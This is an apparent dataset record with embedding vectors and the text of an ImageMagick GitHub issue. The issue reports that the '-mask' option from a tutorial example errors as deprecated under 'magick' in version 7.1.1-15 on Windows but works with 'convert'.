-0.004968605935573578, -0.003633104031905532, 0.005520299542695284, 0.013260829262435436, 0.0004110369482077658, 0.009351878426969051, -0.0033202534541487694, -0.00838977936655283, 0.00009750300523592159, -0.009008752182126045, 0.005453019868582487, -0.019322730600833893, -0.027248280122876167, 0.006085449364036322, 0.025969965383410454, -0.0002604986075311899, 0.005715410690754652, 0.014761166647076607, 0.024610916152596474, 0.008564705960452557, -0.00643530348315835, 0.028795713558793068, -0.003335391404107213, -0.00400987034663558, -0.008457059040665627, -0.007279663812369108, -0.021610241383314133, 0.011585565283894539, 0.015931833535432816, 0.009910300374031067, -0.011646117083728313, -0.023292234167456627, -0.009654637426137924, 0.0263332761824131, -0.00033198329037986696, 0.010852215811610222, -0.008988568559288979, -0.02833821065723896, -0.0031251423060894012, -0.011565380729734898, 0.007232568226754665, 0.0009276189375668764, -0.005291548557579517, -0.007945733144879341, -0.013099358417093754, -0.0037676633801311255, -0.008416690863668919, 0.0030158127192407846, 0.0005853334441781044, 0.006179641000926495, -0.01348958071321249, 0.003757571568712592, -0.025162609294056892, 0.025472095236182213, 0.004538015928119421, -0.007925549522042274, -0.014074914157390594, 0.01690066233277321, 0.010293794795870781, -0.009991035796701908, -0.0037508434616029263, -0.009829564951360226, 0.0019157895585522056, 0.006186368875205517, -0.006660690531134605, 0.0003904325421899557, -0.004130973946303129, -0.011356813833117485, 0.015070653520524502, 0.006186368875205517, 0.029333950951695442, 0.0028122917283326387, 0.020991267636418343, 0.01396726630628109, -0.018703756853938103, -0.00964118167757988, 0.0045750197023153305, -0.00033072178484871984, -0.00461202347651124, -0.015245581045746803, 0.012944615446031094, 0.0066842385567724705, 0.003343801246955991, -0.017008308321237564, -0.030329691246151924, 0.007057641167193651, 0.02082979679107666, -0.013664508238434792, -0.005913885775953531, 0.0007644656579941511, -0.013913442380726337, -0.0025028050877153873, 0.007535326760262251, -0.009291327558457851, -0.011646117083728313, -0.01718323677778244, 0.0008182894089259207, -0.003727295668795705, -0.012621672824025154, -0.014747710898518562, -0.015124477446079254, -0.016618086025118828, 0.0012757914373651147, -0.02814982831478119, -0.00019279839762020856, -0.03189057856798172, 0.022848187014460564, -0.018071329221129417, -0.008039924316108227, -0.018407726660370827, 0.0004717989359050989, -0.0063242921605706215, 0.02039920538663864, -0.027059897780418396, 0.031002487987279892, -0.02061450108885765, -0.02645437978208065, 0.025391360744833946, 0.014936094172298908, -0.007266208063811064, 0.002909847302362323, -0.020506853237748146, 0.01603948138654232, -0.0021008087787777185, -0.01248711347579956, -0.006166184786707163, -0.0005327711696736515, -0.015878010541200638, -0.020412662997841835, -0.0032428817357867956, -0.00603498937562108, -0.02021082304418087, -0.002618862548843026, 0.009250959381461143, -0.03568515554070473, 0.00854452233761549, -0.008490698412060738, -0.011128063313663006, 0.00624355673789978, 0.015891466289758682, -0.009607541374862194, 0.0015709811123088002, 0.009109672158956528, 0.0028627514839172363, 0.0075016869232058525, -0.0011673028348013759, 0.009230775758624077, 0.007642974145710468, 0.014572784304618835, -0.024516724050045013, 0.010704200714826584, 0.03557750582695007, 0.007185472175478935, -0.000016438849343103357, -0.0012127166846767068, 0.010825304314494133, -0.002280781976878643, 0.0378919281065464, 0.000597107398789376, 0.009129855781793594, -0.003912314772605896, 0.01189505122601986, -0.020130086690187454, -0.01234582532197237, 0.00305954460054636, -0.00676833838224411, 0.017506178468465805, -0.011935419403016567, 0.013247373513877392, 0.0017131094355136156, -0.005701954942196608, 0.014438224025070667, 0.011282806284725666, 0.00458174804225564, -0.0031974678859114647, -0.0006610230775550008, 0.008228307589888573, 0.008813641034066677, 0.009102944284677505, -0.005439564120024443, -0.008335955440998077, -0.014411312527954578, 0.014707343652844429, 0.005187265109270811, 0.015030286274850368, -0.0005235201679170132, -0.00777080561965704, -0.01161920465528965, 0.005207449197769165, 0.01056964136660099, 0.0027904256712645292, 0.0035994641948491335, 0.0032226978801190853, 0.014828446321189404, -0.0011252530384808779, -0.006549679208546877, -0.012857151217758656, 0.013408845290541649, -0.0005340326461009681, 0.015743451192975044, 0.006381480023264885, 0.01863647811114788, 0.008531066589057446, -0.017237059772014618, 0.0008124024025164545, -0.007764077745378017, 0.008934744633734226, -0.016860293224453926, 0.008194668218493462, -0.03167528286576271, -0.023965030908584595, 0.010946407914161682, 0.00837632268667221, 0.027248280122876167, -0.008759817108511925, -0.018475007265806198, 0.004968605935573578, 0.004440460354089737, 0.01634896732866764, 0.00393249886110425, 0.0012682224623858929, 0.0023278777953237295, 0.005950890015810728, -0.01811169646680355, 0.00009519026934867725, -0.0035927360877394676, -0.003734023543074727, 0.013207006268203259, -0.007441135123372078, 0.011773948557674885, -0.0006479876465164125, -0.005237725097686052, 0.021583329886198044, 0.018246255815029144, -0.02039920538663864, 0.014747710898518562, 0.014666975475847721, -0.014653519727289677, 0.000089934044808615, 0.0021075366530567408, -0.006828889716416597, 0.02874188870191574, -0.02064141258597374, 0.009493166580796242, 0.011424093507230282, 0.009802652522921562, 0.0036768359132111073, -0.01570308208465576, -0.01072438433766365, 0.007642974145710468, 0.015447420068085194, -0.01203633937984705, -0.025350991636514664, 0.000253350124694407, 0.0004186058940831572, 0.02938777394592762, 0.00979592464864254, -0.012810055166482925, 0.02697916142642498, 0.019551482051610947, 0.0068759857676923275, -0.0008309043478220701, -0.008053380995988846, -0.0013060672208666801, 0.006485763471573591, 0.008813641034066677, -0.0094729820266366, -0.001861965749412775, -0.014101825654506683, 0.007172016426920891, 0.009419158101081848, -0.010340890847146511, 0.015770362690091133, 0.0017761841882020235, 0.01801750436425209, 0.029495421797037125, 0.007750621996819973, -0.008517610840499401, -0.014357488602399826, 0.03307470306754112, 0.0003103276249021292, -0.009816109202802181, 0.010159235447645187, 0.007871725596487522, -0.009708461351692677, 0.004844138864427805, 0.0022437782026827335, -0.0240726787596941, -0.0010403124615550041, -0.020049352198839188, -0.006751518230885267, 0.011397182010114193, 0.012500569224357605, 0.003286613617092371, -0.005490023642778397, -0.005527027882635593, -0.01339538861066103, -0.00009166859672404826, -0.021516049280762672, -0.003406035015359521, -0.019726408645510674, -0.0036835637874901295, 0.01591837778687477, -0.02321149781346321, 0.008975112810730934, -0.011908507905900478, 0.017452355474233627, -0.03269793465733528, 0.006674146745353937, 0.01804441586136818, -0.010482178069651127, -0.008302315138280392, 0.0005836514174006879, -0.011935419403016567, -0.007400767412036657, -0.0034178090281784534, 0.011276078410446644, -0.011720124632120132, -0.0023985214065760374, 0.020789427682757378, -0.010078500024974346, 0.0034480849280953407, 0.007696798071265221, -0.0001149011222878471, 0.0016912436112761497, 0.0020688509102910757, -0.00031348137417808175, -0.004265533294528723, -0.019914792850613594, -0.00393249886110425, -0.02042611874639988, -0.00441018445417285, 0.023063482716679573, 0.01956493780016899, -0.005971073638647795, -0.02311730571091175, -0.009896844625473022, -0.0042554414831101894, -0.003214287804439664, -0.006068629212677479, -0.004578383639454842, -0.013792339712381363, 0.006061901338398457, -0.019336186349391937, 0.02054722234606743, 0.006331020034849644, 0.01206997875124216, -0.0012152396375313401, -0.004487556405365467, 0.0029367590323090553, 0.0010975002078339458, 0.019524570554494858, 0.0034749966580420732, 0.0005567395710386336, 0.01563580334186554, -0.002845931565389037, -0.010387985967099667, -0.0074276793748140335, 0.0016676957020536065, -0.01203633937984705, -0.022632893174886703, -0.017936769872903824, 0.005281456746160984, -0.0308679286390543, 0.005456383805721998, 0.012978254817426205, -0.031567636877298355, 0.013173365965485573, -0.01308590266853571, 0.0002937179524451494, 0.006135908886790276, 0.00559430755674839, -0.00939224660396576, -0.01684683747589588, 0.021421857178211212, -0.031379252672195435, -0.00200493517331779, 0.005395832471549511, 0.011444278061389923, 0.015339772216975689, -0.019120892509818077, 0.0017492723418399692, -0.0030999123118817806, -0.016200952231884003, 0.00818794034421444, 0.001026856480166316, -0.009701733477413654, 0.0028661154210567474, -0.007690070196986198, 0.012971526943147182, 0.0037878472357988358, 0.004036782309412956, 0.018865229561924934, 0.005971073638647795, 0.006468943320214748, -0.00019910586706828326, 0.004016598220914602, -0.008766544982790947, 0.019982071593403816, -0.0012043067254126072, -0.005405924282968044, 0.003908950835466385, -0.019766777753829956, -0.016389336436986923, 0.004733127076178789, 0.0004818908928427845, -0.00526800099760294, -0.009742100723087788, 0.002662594197317958, 0.004228529520332813, -0.014720799401402473, 0.011424093507230282, -0.011181887239217758, -0.009991035796701908, -0.00006507209036499262, 0.002448981162160635, 0.000890615105163306, 0.004083877895027399, 0.005116621498018503, -0.0010848852107301354, 0.011424093507230282, -0.0015920059522613883, 0.015501243993639946, -0.00595761789008975, -0.00010417841986054555, -0.01616058498620987, 0.017452355474233627, 0.029037920758128166, -0.019793689250946045, 0.0035961002577096224, 0.01677955873310566, 0.011006959713995457, -0.015878010541200638, -0.007420951500535011, -0.018865229561924934, 0.0034009891096502542, -0.010428354144096375, -0.019766777753829956, 0.0002926667220890522, -0.005321824457496405, 0.004026690497994423, 0.020587589591741562, 0.018811404705047607, 0.0333707332611084, -0.013899986632168293, -0.004107425920665264, -0.00822157971560955, 0.014936094172298908, 0.006209916900843382, 0.011269350536167622, -0.004507740028202534, 0.002358153695240617, 0.009385518729686737, 0.026037245988845825, 0.010313978418707848, 0.01854228600859642, -0.021623697131872177, -0.004702851176261902, 0.014276753179728985, -0.007945733144879341, -0.0001552689354866743, 0.0049349660985171795, 0.016644999384880066, 0.008860737085342407, 0.004006506409496069, 0.017869489267468452, 0.004951786249876022, -0.008672353811562061, 0.013590499758720398, -0.012944615446031094, -0.01004485972225666, -0.012453473173081875, -0.022821275517344475, -0.008235035464167595, 0.01792331226170063, -0.01653735153377056, -0.01684683747589588, 0.01653735153377056, -0.010266882367432117, -0.018905596807599068, -0.0189459640532732, -0.011403909884393215, -0.0009873296367004514, 0.02061450108885765, 0.00854452233761549, 0.021960094571113586, 0.014034545980393887, 0.011572109535336494, -0.026131436228752136, -0.0016323737800121307, 0.004396728705614805, 0.004655755590647459, 0.018959419801831245, -0.02938777394592762, -0.021583329886198044, -0.011013687588274479, -0.013429028913378716, -0.004181433469057083, 0.007629518397152424, 0.00624355673789978, -0.0009528488153591752, 0.005449655931442976, -0.012460201047360897, -0.025700846686959267, -0.006337747909128666, 0.023534439504146576, -0.004682667553424835, 0.0020385750103741884, 0.012534208595752716, 0.02080288529396057, -0.013630867935717106, 0.005389104131609201, 0.010556185618042946, 0.02008971944451332, 0.0024708472192287445, -0.026279453188180923, 0.00034207524731755257, -0.006075357086956501, -0.003441356820985675, 0.0005865949206054211, 0.015568523667752743, -0.00012720069207716733, 0.008901105262339115, 0.005923978053033352, 0.01813860796391964, -0.005207449197769165, 0.023588264361023903, -0.021193107590079308, 0.012244906276464462, 0.003111686324700713, 0.016725733876228333, 0.009708461351692677, 0.012722591869533062, -0.008161027915775776, -0.016860293224453926, 0.002913211239501834, 0.02457054704427719, -0.00336062116548419, 0.019605305045843124, 0.010502361692488194, -0.005574123468250036, -0.009863204322755337, -1.5768681294048292e-7, -0.0027046441100537777, 0.011080967262387276, 0.027853798121213913, 0.009829564951360226, -0.01490918267518282, 0.01426329743117094, 0.008013012818992138, -0.0007535326876677573, -0.032832495868206024, -0.01104732695966959, 0.023830471560359, -0.028257476165890694, -0.0033976249396800995, -0.010751296766102314, -0.008013012818992138, -0.003195785917341709, 0.01647007092833519, -0.013657779432833195, -0.013523220084607601, 0.006916353479027748, -0.001631532795727253, 0.01077148038893938, 0.020654868334531784, 0.033639851957559586, -0.010852215811610222, 0.005076253786683083, 0.0010209694737568498, 0.007737165782600641, 0.00664387084543705, 0.015299404971301556, -0.011128063313663006, 0.007252751849591732, 0.017358163371682167, 0.006246920675039291, 0.02085670828819275, 0.006317564286291599, -0.012433289550244808, 0.014666975475847721, 0.0013598910300061107, 0.008766544982790947, 0.008006284944713116, -0.001927563571371138, 0.015958745032548904, -0.018380815163254738, -0.00664387084543705, -0.018676845356822014, -0.022565612569451332, -0.009412430226802826, 0.007488231174647808, 0.026683131232857704, -0.013899986632168293, 0.027517398819327354, 0.026225628331303596, 0.006650598719716072, 0.018004048615694046, 0.012709136120975018, -0.004191525746136904, 0.014976462349295616, 0.009042392484843731, 0.0075958785600960255, 0.007299847900867462, 0.010542729869484901, -0.009600813500583172, -0.021031634882092476, 0.03291323035955429, -0.015474331565201283, -0.00967482104897499, -0.001187486806884408, 0.0032025137916207314, 0.002978808945044875, 0.005732230842113495, -0.015447420068085194, 0.01161920465528965, 0.0004495125322137028, -0.0016819925513118505, -0.01591837778687477, 0.01426329743117094, 0.011484645307064056, 0.024960769340395927, 0.013220462016761303, 0.0073536718264222145, -0.023965030908584595, 0.013146454468369484, -0.0039055868983268738, -0.020062807947397232, 0.017842577770352364, 0.008934744633734226, 0.0201435424387455, -0.004834046587347984, -0.009109672158956528, 0.007030729204416275, 0.004003142472356558, 0.003831579117104411, 0.003919042646884918, 0.028634242713451385, 0.009701733477413654, -0.007111464627087116, -0.0016281688585877419, -0.0012034657411277294, 0.0071181925013661385, -0.0007131648599170148, 0.00004367924702819437, 0.004965241998434067, -0.00777080561965704, 0.024893490597605705, 0.00408724183216691, -0.0005920613766647875, 0.025054961442947388, -0.015595435164868832, -0.025593198835849762, 0.012910975143313408, 0.013260829262435436, -0.0014994964003562927, -0.015407051891088486, -0.0214487686753273, 0.006583319045603275, 0.0008363708038814366, -0.011585565283894539, -0.05102492868900299, 0.001774502219632268, -0.009002024307847023, 0.0026642761658877134, 0.0153128607198596, -0.023171130567789078, 0.00354227633215487, -0.009055848233401775, -0.011148246936500072, 0.009076031856238842, -0.01109442301094532, 0.0037844832986593246, -0.017627282068133354, 0.023722823709249496, -0.009910300374031067, 0.010280339047312737, -0.008941472508013248, -0.009573902003467083, 0.019578393548727036, -0.015097565948963165, 0.010919495485723019, 0.003481724765151739, 0.01081857644021511, 0.019026700407266617, 0.040717676281929016, -0.01251402497291565, 0.007205656263977289, 0.00019784437608905137, 0.011686484329402447, 0.000600891828071326, -0.013422301039099693, -0.019363099709153175, -0.00859161838889122, -0.02221575751900673, 0.0017189964419230819, -0.010058315470814705, -0.01449204795062542, -0.010657104663550854, 0.0029703988693654537, 0.022242670878767967, 0.0060820854268968105, 0.011242438107728958, 0.0070441849529743195, 0.006095541175454855, 0.007838085293769836, 0.000604255823418498, -0.01613367348909378, 0.02240414172410965, -0.0012833602959290147, -0.02111237123608589, -0.012709136120975018, 0.0025768126361072063, -0.03210587427020073, -0.008013012818992138, 0.009331694804131985, 0.016456615179777145, -0.0010075136087834835, 0.0027063260786235332, -0.003067954443395138, -0.009816109202802181, -0.0022202301770448685, -0.006031625438481569, -0.006748154293745756, 0.0028375214897096157, -0.006257012486457825, 0.0004089344583917409, -0.003555732313543558, -0.004601931665092707, 0.008409962989389896, -0.024489812552928925, -0.031002487987279892, -0.004914782475680113, 0.0017173144733533263, 0.012574576772749424, -0.020062807947397232, -0.0012253315653651953, 0.008235035464167595, -0.04661137983202934, -0.006135908886790276, 0.007508414797484875, 0.006704422645270824, 0.012224722653627396, -0.0021596786100417376, -0.023615175858139992, 0.009647909551858902, -0.0009923756588250399, -0.0032748396042734385, 0.0028240655083209276, 0.020035896450281143, 0.013664508238434792, -0.013886530883610249, -0.0015272492310032248, -0.006717878393828869, -0.018313534557819366, 0.044270046055316925, -0.00236824550665915, 0.02187936007976532, -0.0029350770637392998, 0.0007783420733176172, -0.005627947393804789, -0.006199824623763561, -0.008039924316108227, -0.008356139063835144, -0.011572109535336494, -0.0058667901903390884, 0.0021041727159172297, 0.008739633485674858, 0.007111464627087116, -0.01437094435095787, 0.0018316899659112096, -0.0030057206749916077, 0.01521866861730814, 0.0017610462382435799, -0.015649259090423584, -0.03415117785334587, -0.0005689340177923441, 0.034474119544029236, -0.030141307041049004, -0.004544743802398443, -0.012783143669366837, 0.013079174794256687, -0.026710042729973793, 0.0014381036162376404, -0.006425211671739817, 0.019484201446175575, -0.017627282068133354, -0.001453241566196084, -0.002906483132392168, 0.018838316202163696, 0.002699598204344511, 0.01647007092833519, 0.017667651176452637, -0.01582418568432331, -0.009620998054742813, 0.006246920675039291, 0.00894820038229227, -0.007414223160594702, 0.0009545307839289308, 0.006741426419466734, 0.003730659605935216, -0.023965030908584595, -0.0005348736303858459, -0.00001791059366951231, 0.00030507141491398215, -0.00724602397531271, 0.004063694272190332, -0.00954698957502842, 0.012009426951408386, -0.0004335335979703814, 0.011020415462553501, 0.017317796126008034, -0.005496751982718706, -0.011908507905900478, -0.02345370501279831, -0.02082979679107666, -0.015151388943195343, 0.00570868281647563, -0.015205212868750095, -0.02431488409638405, -0.004729763139039278, -0.004198253620415926, 0.01782912202179432, -0.011605748906731606, 0.035093095153570175, 0.001830007997341454, 0.009627725929021835, -0.0019056976307183504, 0.011195342987775803, -0.01189505122601986, -0.0028795714024454355, 0.02230994962155819, -0.018623022362589836, -0.0063242921605706215, 0.006956721190363169, 0.0019241995178163052, -0.006364659871906042, 0.00021077469864394516, -0.0076564303599298, 0.000011859361620736308, -0.009802652522921562, 0.004356360994279385, -0.00026323183556087315, 0.017438899725675583, 0.020601045340299606, 0.01081857644021511, -0.01161920465528965, -0.021865904331207275, -0.010636921040713787, 0.008874192833900452, -0.01622786372900009, -0.0022622800897806883, 0.0060820854268968105, -0.006660690531134605, 0.008463786914944649, -0.008208123967051506, 0.022982746362686157, -0.021004723384976387, 0.0025263528805226088, 0.00660686707124114, -0.0016719006234779954, 0.018192432820796967, 0.008907833136618137, -0.003660015994682908, -0.011504828929901123, 0.008557978086173534, -0.009284598752856255, -0.0029989928007125854, 0.00330343353562057, -0.004359724931418896, 0.012339097447693348, 0.006849073804914951, 0.0189459640532732, 0.0062502846121788025, -0.02111237123608589, -0.0043092649430036545, -0.01708904467523098, 0.03442029654979706, -0.00034039324964396656, 0.009203863330185413, -0.001291770371608436, 0.007124920841306448, 0.013651051558554173, -0.009230775758624077, 0.010542729869484901, -0.007999557070434093, -0.015299404971301556, 0.030518073588609695, 0.017263971269130707, -0.007764077745378017, 0.010475450195372105, -0.019820600748062134, 0.012588032521307468, 0.014007634483277798, -0.012285273522138596, -0.013556860387325287, 0.04545416682958603, 0.0025902686174958944, 0.03065263293683529, 0.0034850887022912502, -0.010697472840547562, -0.009708461351692677, 0.00505943363532424, 0.0021529505029320717, -0.01842118240892887, 0.012742775492370129, 0.011451005935668945, 0.008403235115110874, 0.008564705960452557, 0.002001571236178279, -0.011639389209449291, 0.01066383346915245, 0.018192432820796967, -0.007696798071265221, 0.0038921309169381857, -0.00968827772885561, 0.01264185644686222, -0.002783697796985507, 0.021502593532204628, -0.004080513957887888, 0.005136805586516857, -0.010300522670149803, 0.003416127059608698, 0.013058990240097046, 0.006183004938066006, -0.028203651309013367, -0.025472095236182213, -0.0043832724913954735, -0.00826867576688528, 0.0009528488153591752, 0.02008971944451332, 0.014734255149960518, 0.0032748396042734385, 0.014949549920856953, 0.00760933430865407, 0.015931833535432816, 0.024126501753926277, -0.0007514301687479019, 0.02664276212453842, 0.037784282118082047, 0.00388540280982852, 0.0034043530467897654, -0.00964118167757988, 0.019322730600833893, -0.014532416127622128, -0.003143644193187356, -0.019780233502388, -0.0006597616011276841, 0.0008502472774125636, -0.01575690694153309, 0.009869932197034359, 0.019241996109485626, 0.019228538498282433, 0.013408845290541649, 0.002008299110457301, 0.005712046753615141, -0.014317121356725693, -0.02833821065723896, 0.017438899725675583 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-15 ### Operating system Windows ### Operating system, version and so on 10 ### Description I tryied this: magick rose: -mask rose_bg_mask.png -modulate 110,100,33.3 +mask rose_blue.png from the official tutorial example and got the following message: magick: option deprecated, unable to execute `-mask' at CLI arg 2 @ error/operation.c/CLIOption/5411. When I tried to use convert rather than magick, it worked. ### Steps to Reproduce magick rose: -mask rose_bg_mask.png -modulate 110,100,33.3 +mask rose_blue.png ### Images _No response_
-mask bug
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6583/comments
2
2023-08-24T14:50:50
2023-08-25T16:06:09Z
https://github.com/ImageMagick/ImageMagick/issues/6583
1,865,334,646
6,583
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : -mask bug Issue date: --- start body --- ### ImageMagick version 7.1.1-15 ### Operating system Windows ### Operating system, version and so on 10 ### Description I tryied this: magick rose: -mask rose_bg_mask.png -modulate 110,100,33.3 +mask rose_blue.png from the official tutorial example and got the following message: magick: option deprecated, unable to execute `-mask' at CLI arg 2 @ error/operation.c/CLIOption/5411. When I tried to use convert rather than magick, it worked. ### Steps to Reproduce magick rose: -mask rose_bg_mask.png -modulate 110,100,33.3 +mask rose_blue.png ### Images _No response_ --- end body ---
732
[ -0.027491090819239616, -0.005517230834811926, -0.005820027552545071, 0.009619065560400486, 0.020618317648768425, 0.012097770348191261, -0.02668832801282406, 0.04763057082891464, -0.0554891899228096, 0.03253300115466118, -0.039208605885505676, -0.011604845523834229, 0.015069399029016495, -0.007541741710156202, -0.014315929263830185, 0.01220339722931385, -0.02904028259217739, 0.035518717020750046, -0.011344300583004951, -0.02225201018154621, -0.02128024585545063, 0.012914616614580154, -0.022646348923444748, 0.030983811244368553, -0.029293786734342575, 0.010203532874584198, -0.030645806342363358, 0.033011842519044876, -0.01637917011976242, -0.010372535325586796, 0.025406725704669952, 0.022773101925849915, 0.0056122951209545135, 0.041039466857910156, 0.0014946168521419168, 0.009337394498288631, -0.025167305022478104, 0.0669250339269638, -0.005791860166937113, 0.039687447249889374, -0.04554620385169983, -0.03923677280545235, 0.007245986722409725, -0.02246326394379139, -0.046391215175390244, -0.027969932183623314, -0.04056062549352646, -0.022350594401359558, -0.025632062926888466, -0.0002482225827407092, 0.02195625565946102, -0.04382801055908203, 0.013668086379766464, 0.007323446683585644, -0.028505107387900352, -0.0159707460552454, 0.005756651517003775, -0.003469834802672267, -0.010379577055573463, -0.009654274210333824, -0.03309634327888489, 0.029406454414129257, -0.00999227911233902, 0.010752791538834572, -0.031659822911024094, -0.022266093641519547, -0.02054790034890175, 0.002124855760484934, -0.029237451031804085, -0.0029892337042838335, 0.017041096463799477, 0.004573632963001728, -0.0012833635555580258, 0.01659042201936245, 0.027857264503836632, -0.00046211649896577, 0.06827705353498459, 0.0026864372193813324, -0.03323718160390854, 0.035969387739896774, -0.03712423890829086, 0.024477211758494377, -0.062474630773067474, 0.019350798800587654, 0.031124647706747055, -0.0042356280609965324, -0.0026952396146953106, -0.06382665038108826, -0.030983811244368553, -0.025871483609080315, -0.011400634422898293, 0.015590490773320198, 0.014646893367171288, -0.019463466480374336, 0.01670309156179428, 0.011464009992778301, 0.011358384042978287, -0.01075983326882124, -0.046532053500413895, -0.030927477404475212, -0.0019312069052830338, -0.010999253019690514, 0.01087954267859459, 0.01950571872293949, 0.032420333474874496, -0.0028167101554572582, -0.0019505717791616917, -0.030589472502470016, 0.009745817631483078, 0.10737299174070358, -0.004344775341451168, 0.01950571872293949, -0.015083483420312405, 0.01535107009112835, 0.02313927374780178, 0.041574642062187195, 0.006084093824028969, 0.013175161555409431, -0.008210710249841213, 0.0023748388048261404, -0.033603351563215256, -0.009731733240187168, -0.03309634327888489, -0.01292870007455349, -0.04264499247074127, 0.023547697812318802, -0.011787932366132736, 0.015041232109069824, 0.005436250474303961, 0.023547697812318802, -0.014618725515902042, 0.00713683944195509, -0.008126208558678627, -0.012344232760369778, -0.00818958505988121, -0.015069399029016495, -0.02863185852766037, 0.03382869064807892, -0.036701735109090805, 0.0011486896546557546, -0.07103743404150009, -0.025195471942424774, 0.0039997282437980175, 0.015196151100099087, -0.036110226064920425, 0.025378558784723282, -0.030533138662576675, -0.013893422670662403, -0.003809600602835417, 0.004855304025113583, -0.02815301902592182, -0.02066056989133358, 0.03563138470053673, 0.012041435576975346, 0.042729493230581284, 0.004626446403563023, 0.017350934445858, -0.023927953094244003, -0.009583855979144573, -0.03754674643278122, -0.011872433125972748, -0.026786914095282555, 0.004274357575923204, 0.013097702525556087, -0.018998710438609123, -0.006879814434796572, -0.011633013375103474, 0.025139138102531433, 0.01413988508284092, 0.03926493972539902, -0.01594257913529873, 0.0322231650352478, -0.00960498210042715, -0.024772966280579567, -0.016576338559389114, 0.002786782570183277, -0.0059432582929730415, -0.006055926904082298, 0.01871703937649727, -0.004225065466016531, -0.013604709878563881, -0.0031687989830970764, 0.008879679255187511, -0.005724963266402483, 0.03529337793588638, -0.028674108907580376, -0.008900804445147514, -0.010252824984490871, -0.00044121124665252864, -0.026547493413090706, 0.012379441410303116, 0.016689008101820946, 0.009309227578341961, -0.056475039571523666, 0.016153832897543907, 0.032927341759204865, -0.022674517706036568, -0.021153492853045464, 0.008182543329894543, -0.021111242473125458, 0.00814733374863863, -0.05813689902424812, -0.0410958006978035, -0.018604369834065437, -0.02456171251833439, 0.0319414921104908, -0.0159707460552454, -0.007837495766580105, 0.02951912209391594, -0.05303865298628807, 0.01744951866567135, -0.03653272986412048, 0.004763761069625616, 0.013780754990875721, 0.017900193110108376, 0.002969868713989854, -0.016984762623906136, -0.030504971742630005, -0.033011842519044876, 0.02151966653764248, 0.028561441227793694, -0.0386170968413353, 0.007316404487937689, -0.041630975902080536, -0.07019241899251938, -0.009647232480347157, -0.01446380652487278, -0.044053345918655396, -0.042870327830314636, -0.006034801714122295, -0.0000953940543695353, 0.0018167780945077538, 0.00725302891805768, 0.00235019251704216, 0.02904028259217739, 0.008076916448771954, 0.0067178537137806416, 0.017421351745724678, 0.01764668896794319, -0.0024857467506080866, 0.016604507341980934, 0.03819458931684494, -0.00814733374863863, -0.018041029572486877, 0.03836359083652496, 0.0384199284017086, 0.028491023927927017, -0.0401381216943264, -0.06348864734172821, -0.005513709969818592, 0.022308344021439552, -0.03087114356458187, -0.03025146760046482, 0.003029723884537816, -0.010386618785560131, -0.04022262245416641, 0.017350934445858, -0.0022252011112868786, 0.00841492135077715, -0.0029276181012392044, 0.045236364006996155, 0.036645397543907166, -0.00805579125881195, 0.029997963458299637, 0.07227678596973419, -0.020111311227083206, -0.025786980986595154, -0.004137042909860611, 0.005577086005359888, -0.0013036086456850171, -0.015689074993133545, -0.04301116615533829, -0.009520480409264565, 0.015196151100099087, -0.010027488693594933, -0.02470254898071289, -0.00894305482506752, 0.033547017723321915, 0.02211117558181286, -0.04044795781373978, -0.007189652882516384, 0.04419418424367905, 0.02532222494482994, 0.02373078279197216, 0.0020121873822063208, 0.016125665977597237, -0.005964383948594332, -0.0064256200566887856, -0.06253096461296082, -0.021646417677402496, -0.012879407033324242, 0.009541605599224567, 0.005101766437292099, -0.013154036365449429, 0.025927817448973656, -0.023984286934137344, -0.009682441130280495, -0.024336375296115875, -0.0036511605139821768, 0.03388502448797226, 0.007126276846975088, -0.01279490627348423, 0.0327020063996315, -0.012309023179113865, 0.0022498471662402153, 0.03320901468396187, 0.06647436320781708, 0.0296036247164011, -0.015379237942397594, -0.006485475227236748, -0.002755094552412629, 0.007133318576961756, -0.009281059727072716, 0.0010087343398481607, -0.05430617183446884, -0.006013676058501005, 0.030955644324421883, -0.036053888499736786, 0.002332588192075491, -0.013534292578697205, -0.0036229933612048626, -0.03557505086064339, -0.0294627882540226, 0.025308141484856606, 0.015083483420312405, -0.009731733240187168, -0.022097092121839523, 0.033603351563215256, -0.05774255841970444, -0.026913665235042572, -0.01094996090978384, -0.026786914095282555, 0.024660296738147736, -0.015153900720179081, 0.024096956476569176, -0.04289849475026131, 0.007717785891145468, 0.01449197344481945, 0.02213934250175953, 0.005200351122766733, -0.013632876798510551, -0.006143948994576931, -0.001943530049175024, -0.017224183306097984, 0.020463399589061737, -0.030026130378246307, 0.02413920685648918, 0.021378830075263977, 0.028730444610118866, 0.010161281563341618, 0.000846333394292742, 0.03073030710220337, -0.015013065189123154, -0.01853395253419876, -0.024575795978307724, -0.011147130280733109, -0.016181999817490578, -0.0443350188434124, -0.014632808975875378, 0.00789383053779602, -0.0030895790550857782, -0.03957477957010269, 0.0007165006245486438, -0.02547714300453663, 0.01052041258662939, 0.0055946907959878445, -0.017435435205698013, -0.03078664280474186, -0.03191332519054413, -0.02889944612979889, 0.0026336240116506815, 0.024280041456222534, -0.04365900903940201, 0.03929310664534569, -0.026998167857527733, -0.020435232669115067, -0.00782341230660677, -0.010090864263474941, -0.018336784094572067, 0.014245511963963509, -0.028209352865815163, 0.015238402411341667, 0.02456171251833439, -0.03822275623679161, 0.026279905810952187, 0.010851375758647919, -0.026279905810952187, 0.002137178787961602, 0.02949095517396927, -0.020294396206736565, -0.04923609271645546, -0.05241897702217102, -0.019914140924811363, -0.01812553033232689, -0.009358519688248634, 0.02273085154592991, -0.0105837881565094, -0.005974946543574333, 0.026871414855122566, 0.0026054568588733673, 0.0064467452466487885, -0.06213662773370743, 0.017280517145991325, 0.02836427092552185, -0.005908049643039703, 0.021153492853045464, -0.003418782027438283, -0.043461836874485016, 0.0060066343285143375, 0.011287965811789036, -0.008309295400977135, 0.011555553413927555, -0.0030684536322951317, 0.018350867554545403, 0.011449926532804966, -0.012562527321279049, 0.007731869351118803, 0.0038448094855993986, -0.04943326488137245, -0.012125937268137932, 0.0016618589870631695, -0.019519802182912827, -0.02113940939307213, 0.00595382135361433, 0.05106695368885994, 0.0012516755377873778, 0.008992346934974194, 0.0027815012726932764, 0.026054568588733673, -0.009450063109397888, -0.016139749437570572, -0.01847761869430542, 0.0018467055633664131, -0.00495036831125617, 0.014358180575072765, -0.01759035512804985, -0.015520073473453522, 0.014998981729149818, 0.018280448392033577, 0.014689143747091293, 0.007929039187729359, 0.03154715523123741, 0.012013268657028675, -0.006263659335672855, -0.050278276205062866, 0.008802219294011593, -0.0438561774790287, 0.02251959778368473, -0.004436318296939135, -0.04602504521608353, -0.017393184825778008, 